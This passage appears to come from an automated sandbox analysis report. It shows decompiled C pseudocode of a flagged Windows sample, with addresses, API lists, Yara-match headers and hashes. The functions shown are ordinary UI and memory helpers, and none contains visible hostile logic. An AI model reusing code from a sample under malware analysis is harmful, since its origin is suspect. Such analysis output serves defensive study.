						return __ecx + 0x214;
					}
					_t25 = _t23 - 1;
					if(_t25 == 0) {
						return __ecx + 0x294;
					}
					_t27 = _t25 - 1;
					if(_t27 == 0) {
						return __ecx + 0x314;
					}
					_t29 = _t27 - 1;
					if(_t29 == 0) {
						_t49 =  *((intOrPtr*)(__ecx + 0x3a0));
						if(_t49 < 1 || _t49 > 7) {
							if(_t49 < 8 || _t49 > 0xe) {
								if(_t49 < 0xf || _t49 > 0x19) {
									if(_t49 < 0x1a || _t49 > 0x2d) {
										if(_t49 < 0x2e) {
											L16:
											return _t47;
										}
										_t42 = 0x519;
									} else {
										_t42 = 0x518;
									}
								} else {
									_t42 = 0x517;
								}
							} else {
								_t42 = 0x516;
							}
							goto L20;
						} else {
							_t42 = 0x515;
							L20:
							return E004078FF(_t42);
						}
					}
					_t32 = _t29 - 1;
					if(_t32 == 0) {
						return __ecx + 0x190;
					}
					if(_t32 != 1) {
						goto L16;
					}
					_t50 =  *((intOrPtr*)(__ecx + 0x39c));
					L14:
					if(_t50 != 0) {
						_push(0xa);
						_push(_t47);
						_push(_t50);
						L0041158E();
					}
					goto L16;
				}
				if(_t57 == 0) {
					_t42 =  *((intOrPtr*)(__ecx + 0x210)) + 0x320;
					goto L20;
				}
				if(_t22 == 0xfffffff6) {
					_t36 = E004078FF( *((intOrPtr*)(__ecx + 0x8c)) + 0x384);
					sprintf(_t47, "%s  %s  %s", E004078FF( *((intOrPtr*)(_t48 + 0x210)) + 0x320), _t48 + 0x110, _t36);
					goto L16;
				}
				if(_t22 == 0) {
					return __ecx + 0xc;
				}
				if(_t22 == 1) {
					_t42 =  *((intOrPtr*)(__ecx + 0x8c)) + 0x384;
					goto L20;
				}
				if(_t22 == 2) {
					return __ecx + 0x90;
				}
				if(_t22 == 3) {
					return __ecx + 0x110;
				}
				if(_t22 == 4) {
					_t50 =  *((intOrPtr*)(__ecx + 0x394));
					goto L14;
				}
				if(_t22 != 5) {
					goto L16;
				}
				if( *((intOrPtr*)(__ecx + 0x398)) == 0) {
					_push(0x10);
				} else {
					_push(0xf);
				}
				_pop(_t42);
				goto L20;
			}

















                                                                        0x00402221
                                                                        0x00402225
                                                                        0x0040222b
                                                                        0x0040222f
                                                                        0x00402231
                                                                        0x00402234
                                                                        0x00402312
                                                                        0x00402315
                                                                        0x00000000
                                                                        0x004023c2
                                                                        0x0040231b
                                                                        0x0040231c
                                                                        0x00000000
                                                                        0x004023ba
                                                                        0x00402322
                                                                        0x00402323
                                                                        0x00000000
                                                                        0x004023b2
                                                                        0x00402329
                                                                        0x0040232a
                                                                        0x00402349
                                                                        0x00402352
                                                                        0x00402366
                                                                        0x0040237a
                                                                        0x0040238e
                                                                        0x004023a2
                                                                        0x0040228e
                                                                        0x00000000
                                                                        0x0040228e
                                                                        0x004023a8
                                                                        0x00402395
                                                                        0x00402395
                                                                        0x00402395
                                                                        0x00402381
                                                                        0x00402381
                                                                        0x00402381
                                                                        0x0040236d
                                                                        0x0040236d
                                                                        0x0040236d
                                                                        0x00000000
                                                                        0x00402359
                                                                        0x00402359
                                                                        0x004022b7
                                                                        0x00000000
                                                                        0x004022b7
                                                                        0x00402352
                                                                        0x0040232c
                                                                        0x0040232d
                                                                        0x00000000
                                                                        0x00402341
                                                                        0x00402330
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00402336
                                                                        0x0040227e
                                                                        0x00402280
                                                                        0x00402282
                                                                        0x00402284
                                                                        0x00402285
                                                                        0x00402286
                                                                        0x0040228b
                                                                        0x00000000
                                                                        0x00402280
                                                                        0x0040223a
                                                                        0x0040230a
                                                                        0x00000000
                                                                        0x0040230a
                                                                        0x00402243
                                                                        0x004022d5
                                                                        0x004022fa
                                                                        0x00000000
                                                                        0x004022ff
                                                                        0x0040224b
                                                                        0x00000000
                                                                        0x004022c1
                                                                        0x00402250
                                                                        0x004022b1
                                                                        0x00000000
                                                                        0x004022b1
                                                                        0x00402255
                                                                        0x00000000
                                                                        0x004022a0
                                                                        0x0040225a
                                                                        0x00000000
                                                                        0x00402295
                                                                        0x0040225f
                                                                        0x00402278
                                                                        0x00000000
                                                                        0x00402278
                                                                        0x00402264
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040226d
                                                                        0x00402274
                                                                        0x0040226f
                                                                        0x0040226f
                                                                        0x0040226f
                                                                        0x00402271
                                                                        0x00000000

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _ultoasprintf
                                                                        • String ID: %s %s %s
                                                                        • API String ID: 432394123-3850900253
                                                                        • Opcode ID: 7ea893eb970b9f9c330beb309c0cc5b8cf8f56ebc8930b7fcefd01bde23561b2
                                                                        • Instruction ID: d9c328b9b741649d7ae815da5d558f3ae5f994b92098e95e7c9169487fd3f945
                                                                        • Opcode Fuzzy Hash: 7ea893eb970b9f9c330beb309c0cc5b8cf8f56ebc8930b7fcefd01bde23561b2
                                                                        • Instruction Fuzzy Hash: C4410932504B15C7C636956487CCBEBA264A742304F6508BFEC5AF72D1C2FCAD41976B
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00406680, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00406680(intOrPtr* __ebx, intOrPtr __ecx, char* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;
				intOrPtr _t23;
				intOrPtr* _t33;
				intOrPtr _t34;
				char* _t38;

				_t38 = __edi;
				_t34 = __ecx;
				_t33 = __ebx;
				_t23 = 1;
				if(__ebx != 0) {
					_t23 =  *__ebx;
				}
				_v64 = _v64 & 0x00000000;
				_v44 = _v44 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_v56 = _t23;
				_v32 = _a8;
				_v20 = _a12;
				_v76 = _t34;
				_v80 = 0x4c;
				_v68 = _a4;
				_v52 = _t38;
				_v48 = 0x104;
				_v28 = 0x80806;
				if(GetSaveFileNameA( &_v80) == 0) {
					return 0;
				} else {
					if(_t33 != 0) {
						 *_t33 = _v56;
					}
					strcpy(_t38, _v52);
					return 1;
				}
			}



















                                                                        0x00406680
                                                                        0x00406680
                                                                        0x00406680
                                                                        0x00406688
                                                                        0x0040668b
                                                                        0x0040668d
                                                                        0x0040668d
                                                                        0x0040668f
                                                                        0x00406693
                                                                        0x00406697
                                                                        0x0040669b
                                                                        0x004066a1
                                                                        0x004066a7
                                                                        0x004066aa
                                                                        0x004066b4
                                                                        0x004066bb
                                                                        0x004066be
                                                                        0x004066c1
                                                                        0x004066c8
                                                                        0x004066d7
                                                                        0x004066f5
                                                                        0x004066d9
                                                                        0x004066db
                                                                        0x004066e0
                                                                        0x004066e0
                                                                        0x004066e6
                                                                        0x004066f1
                                                                        0x004066f1

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileNameSavestrcpy
                                                                        • String ID: L
                                                                        • API String ID: 1182090483-2909332022
                                                                        • Opcode ID: 60ad435b05b414f2b30048372afc6468a300e5fb370a7e0e1bfb6bb36773f123
                                                                        • Instruction ID: a38c0b8f1c2b7ba0f1b8aa2faef71ae79cae630a3543d59e66951d479f2b4fd1
                                                                        • Opcode Fuzzy Hash: 60ad435b05b414f2b30048372afc6468a300e5fb370a7e0e1bfb6bb36773f123
                                                                        • Instruction Fuzzy Hash: 7F0125B1E102199FDF00CFA9D8807AEBBF8FF08319F10442AE915E6280DBB88915CF44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040ADB3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040ADB3(void* __ebx, void* __eflags) {
				char _v265;
				char _v526;
				char _v787;
				void _v1048;
				void _v3648;
				intOrPtr _v3652;
				char _v3660;
				void* _t30;

				_t30 = __ebx;
				_v3660 = 0x41300c;
				memset( &_v3648, 0, 0x10);
				_v1048 = 0;
				_v787 = 0;
				_v526 = 0;
				_v265 = 0;
				_v3652 = 0x6c;
				memcpy( &_v1048,  *((intOrPtr*)(__ebx + 0x370)) + 0xb20, 0x105 << 2);
				if(E00401596( &_v3660,  *((intOrPtr*)(__ebx + 0x108))) != 0) {
					E0040AD9D(memcpy( *((intOrPtr*)(__ebx + 0x370)) + 0xb20,  &_v1048, 0x105 << 2));
				}
				SetFocus( *( *((intOrPtr*)(_t30 + 0x370)) + 0x184));
				return E0040143D( &_v3660);
			}











                                                                        0x0040adb3
                                                                        0x0040adc9
                                                                        0x0040add3
                                                                        0x0040ade7
                                                                        0x0040adee
                                                                        0x0040adf5
                                                                        0x0040adfc
                                                                        0x0040ae03
                                                                        0x0040ae1e
                                                                        0x0040ae2d
                                                                        0x0040ae4a
                                                                        0x0040ae4a
                                                                        0x0040ae5b
                                                                        0x0040ae6f

                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040ADD3
                                                                        • SetFocus.USER32(?,?), ref: 0040AE5B
                                                                          • Part of subcall function 0040AD9D: PostMessageA.USER32 ref: 0040ADAC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FocusMessagePostmemset
                                                                        • String ID: l
                                                                        • API String ID: 3436799508-2517025534
                                                                        • Opcode ID: aeb443fdb5aee6ef7c028d3e89b28528cc274f3a7ebb19c8f17c9a74365f91d9
                                                                        • Instruction ID: a3aa1947760d1632b5ff20bf1b11b778d92a779fff19439862dc3abef3b95f30
                                                                        • Opcode Fuzzy Hash: aeb443fdb5aee6ef7c028d3e89b28528cc274f3a7ebb19c8f17c9a74365f91d9
                                                                        • Instruction Fuzzy Hash: 1011A1719002589BDF21AB14CC047CA7BAAAF80308F0804F5A94C7B292C7B55B88CFA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00408441, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00408441(void** __esi, struct HWND__* _a4) {
				long _v12;
				signed int _v24;
				signed int _v28;
				short _v32;
				void* _v40;
				long _t17;
				short* _t23;
				int _t24;
				void** _t25;

				_t25 = __esi;
				_t24 = 0;
				if(_a4 != 0) {
					_t17 = memset( *__esi, 0, __esi[1] << 2);
					if(__esi[1] > 0) {
						do {
							_v28 = _v28 & 0x00000000;
							_v24 = _v24 & 0x00000000;
							_t23 =  *_t25 + _t24 * 4;
							_v40 = 0x22;
							_t17 = SendMessageA(_a4, 0x1019, _t24,  &_v40);
							if(_t17 != 0) {
								 *_t23 = _v32;
								_t17 = _v12;
								 *(_t23 + 2) = _t17;
							}
							_t24 = _t24 + 1;
						} while (_t24 < _t25[1]);
					}
				}
				return _t17;
			}












                                                                        0x00408441
                                                                        0x00408449
                                                                        0x0040844e
                                                                        0x0040845a
                                                                        0x00408465
                                                                        0x00408467
                                                                        0x00408469
                                                                        0x0040846d
                                                                        0x00408471
                                                                        0x00408481
                                                                        0x00408488
                                                                        0x00408490
                                                                        0x00408496
                                                                        0x00408499
                                                                        0x0040849d
                                                                        0x0040849d
                                                                        0x004084a1
                                                                        0x004084a2
                                                                        0x00408467
                                                                        0x00408465
                                                                        0x004084aa

                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040845A
                                                                        • SendMessageA.USER32(?,00001019,00000000,?), ref: 00408488
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessageSendmemset
                                                                        • String ID: "
                                                                        • API String ID: 568519121-123907689
                                                                        • Opcode ID: 34401dede8e385bb68c53d7b6caaa6400c7ccd3c24b43ec3f913943d5d854be5
                                                                        • Instruction ID: 3d4b9897b9e590d379032152458179bae83636b6f0047c21005e3f982915147a
                                                                        • Opcode Fuzzy Hash: 34401dede8e385bb68c53d7b6caaa6400c7ccd3c24b43ec3f913943d5d854be5
                                                                        • Instruction Fuzzy Hash: 4F01D635900205AFDB20CF95C941EAFB7F8FF84759F10842EE891AA240E738DA85CB75
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00406618, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00406618(intOrPtr __eax, char* __esi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;

				_v76 = __eax;
				_v68 = _a4;
				_v64 = 0;
				_v44 = 0;
				_v36 = 0;
				_v32 = _a8;
				_v80 = 0x4c;
				_v56 = 1;
				_v52 = __esi;
				_v48 = 0x104;
				_v28 = 0x81804;
				_v20 = 0x413008;
				if(GetOpenFileNameA( &_v80) == 0) {
					return 0;
				} else {
					strcpy(__esi, _v52);
					return 1;
				}
			}















                                                                        0x0040661e
                                                                        0x00406624
                                                                        0x00406629
                                                                        0x0040662c
                                                                        0x0040662f
                                                                        0x00406635
                                                                        0x0040663c
                                                                        0x00406643
                                                                        0x0040664a
                                                                        0x0040664d
                                                                        0x00406654
                                                                        0x0040665b
                                                                        0x0040666a
                                                                        0x0040667f
                                                                        0x0040666c
                                                                        0x00406670
                                                                        0x0040667b
                                                                        0x0040667b

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileNameOpenstrcpy
                                                                        • String ID: L
                                                                        • API String ID: 812585365-2909332022
                                                                        • Opcode ID: 005d7a4cd57d0344050e2e978546a456973b8179e79084affb1262c5eec5662a
                                                                        • Instruction ID: 13dc2997c8553d865726dff807e233ea18e6c60b58d53e24b26ad6de5975139e
                                                                        • Opcode Fuzzy Hash: 005d7a4cd57d0344050e2e978546a456973b8179e79084affb1262c5eec5662a
                                                                        • Instruction Fuzzy Hash: 5201B2B1D10218AFCF40DFA9D8456CEBFF8BB08308F00812AE519E6240E7B886458F98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004084CE, Relevance: 5.1, APIs: 4, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 88%
                                                                        			E004084CE(intOrPtr* __esi, void* __eflags) {
				intOrPtr* _t22;
				intOrPtr* _t31;

				_t31 = __esi;
				 *__esi = 0x413320;
				_t22 = E00406549(0x1c8, __esi);
				_push(0x14);
				L004115D0();
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t31 + 4)) = _t22;
				L004115D0();
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t31 + 8)) = _t22;
				L004115D0();
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t31 + 0xc)) = _t22;
				L004115D0();
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				 *((intOrPtr*)(_t31 + 0x10)) = _t22;
				return _t31;
			}





                                                                        0x004084ce
                                                                        0x004084d6
                                                                        0x004084dc
                                                                        0x004084e1
                                                                        0x004084e3
                                                                        0x004084f3
                                                                        0x00408505
                                                                        0x004084f5
                                                                        0x004084f5
                                                                        0x004084f8
                                                                        0x004084fa
                                                                        0x004084fd
                                                                        0x00408500
                                                                        0x00408500
                                                                        0x00408507
                                                                        0x00408509
                                                                        0x0040850c
                                                                        0x00408514
                                                                        0x00408526
                                                                        0x00408516
                                                                        0x00408516
                                                                        0x00408519
                                                                        0x0040851b
                                                                        0x0040851e
                                                                        0x00408521
                                                                        0x00408521
                                                                        0x00408528
                                                                        0x0040852a
                                                                        0x0040852d
                                                                        0x00408535
                                                                        0x00408547
                                                                        0x00408537
                                                                        0x00408537
                                                                        0x0040853a
                                                                        0x0040853c
                                                                        0x0040853f
                                                                        0x00408542
                                                                        0x00408542
                                                                        0x00408549
                                                                        0x0040854b
                                                                        0x0040854e
                                                                        0x00408556
                                                                        0x00408568
                                                                        0x00408558
                                                                        0x00408558
                                                                        0x0040855b
                                                                        0x0040855d
                                                                        0x00408560
                                                                        0x00408563
                                                                        0x00408563
                                                                        0x0040856b
                                                                        0x00408571

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ??2@$memset
                                                                        • String ID:
                                                                        • API String ID: 1860491036-0
                                                                        • Opcode ID: 95721ad3e56739601f71688443cad15957724b47e5dc3dc32a69c890d8a4f10a
                                                                        • Instruction ID: 33d46294e57da76ea2c08804649fae6184d1477937e8cd9eb119e1572679ad16
                                                                        • Opcode Fuzzy Hash: 95721ad3e56739601f71688443cad15957724b47e5dc3dc32a69c890d8a4f10a
                                                                        • Instruction Fuzzy Hash: F321B3B0A01300AED7518F2B9945955FBE4FF94355B2AC8AFD149DB2B2EBB8C8408F14
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00406A74, Relevance: 5.1, APIs: 4, Instructions: 63stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00406A74(void* __eax, void* __ecx, char* _a4) {
				int _v8;
				void* __edi;
				int _t27;
				intOrPtr _t28;
				intOrPtr _t31;
				intOrPtr _t42;
				intOrPtr _t52;
				void** _t55;
				void** _t56;
				void* _t59;

				_t59 = __eax;
				_t27 = strlen(_a4);
				_t42 =  *((intOrPtr*)(_t59 + 4));
				_t52 = _t42 + _t27 + 1;
				_v8 = _t27;
				_t28 =  *((intOrPtr*)(_t59 + 0x14));
				 *((intOrPtr*)(_t59 + 4)) = _t52;
				_t55 = _t59 + 0x10;
				if(_t52 != 0xffffffff) {
					E004060FA(_t59, _t52, _t55, 1, _t28);
				} else {
					free( *_t55);
				}
				_t53 =  *(_t59 + 0x1c);
				_t31 =  *((intOrPtr*)(_t59 + 0x18));
				_t56 = _t59 + 0xc;
				if( *(_t59 + 0x1c) != 0xffffffff) {
					E004060FA(_t59 + 8, _t53, _t56, 4, _t31);
				} else {
					free( *_t56);
				}
				memcpy( *(_t59 + 0x10) + _t42, _a4, _v8);
				 *((char*)( *(_t59 + 0x10) + _t42 + _v8)) = 0;
				 *((intOrPtr*)( *_t56 +  *(_t59 + 0x1c) * 4)) = _t42;
				 *(_t59 + 0x1c) =  *(_t59 + 0x1c) + 1;
				_t25 =  *(_t59 + 0x1c) - 1; // -1
				return _t25;
			}













                                                                        0x00406a7e
                                                                        0x00406a80
                                                                        0x00406a85
                                                                        0x00406a88
                                                                        0x00406a8f
                                                                        0x00406a92
                                                                        0x00406a96
                                                                        0x00406a99
                                                                        0x00406a9c
                                                                        0x00406aac
                                                                        0x00406a9e
                                                                        0x00406aa0
                                                                        0x00406aa0
                                                                        0x00406ab2
                                                                        0x00406ab8
                                                                        0x00406abc
                                                                        0x00406abf
                                                                        0x00406ad0
                                                                        0x00406ac1
                                                                        0x00406ac3
                                                                        0x00406ac3
                                                                        0x00406ae3
                                                                        0x00406af0
                                                                        0x00406afc
                                                                        0x00406aff
                                                                        0x00406b06
                                                                        0x00406b0c

                                                                        APIs
                                                                        • strlen.MSVCRT ref: 00406A80
                                                                        • free.MSVCRT(?,00000001,?,00000000,?,?,00406DCF,?,00000000,?,?), ref: 00406AA0
                                                                          • Part of subcall function 004060FA: malloc.MSVCRT ref: 00406116
                                                                          • Part of subcall function 004060FA: memcpy.MSVCRT ref: 0040612E
                                                                          • Part of subcall function 004060FA: free.MSVCRT(00000000,00000000,73B74DE0,00406B49,00000001,?,00000000,73B74DE0,00406D88,00000000,?,?), ref: 00406137
                                                                        • free.MSVCRT(?,00000001,?,00000000,?,?,00406DCF,?,00000000,?,?), ref: 00406AC3
                                                                        • memcpy.MSVCRT ref: 00406AE3
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: free$memcpy$mallocstrlen
                                                                        • String ID:
                                                                        • API String ID: 3669619086-0
                                                                        • Opcode ID: 5eb856daf9b2f55e9999836f5936cf74f251c15999897e978b7d5133cb55aa44
                                                                        • Instruction ID: e46d755c35f7a0493bef025674ad9543d325b8c94dab604409744cdcda2aebf9
                                                                        • Opcode Fuzzy Hash: 5eb856daf9b2f55e9999836f5936cf74f251c15999897e978b7d5133cb55aa44
                                                                        • Instruction Fuzzy Hash: 70116D71200700EFC730EF18D8819AAB7F5EF45328B108A2EF957A7691DB35F9658B54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%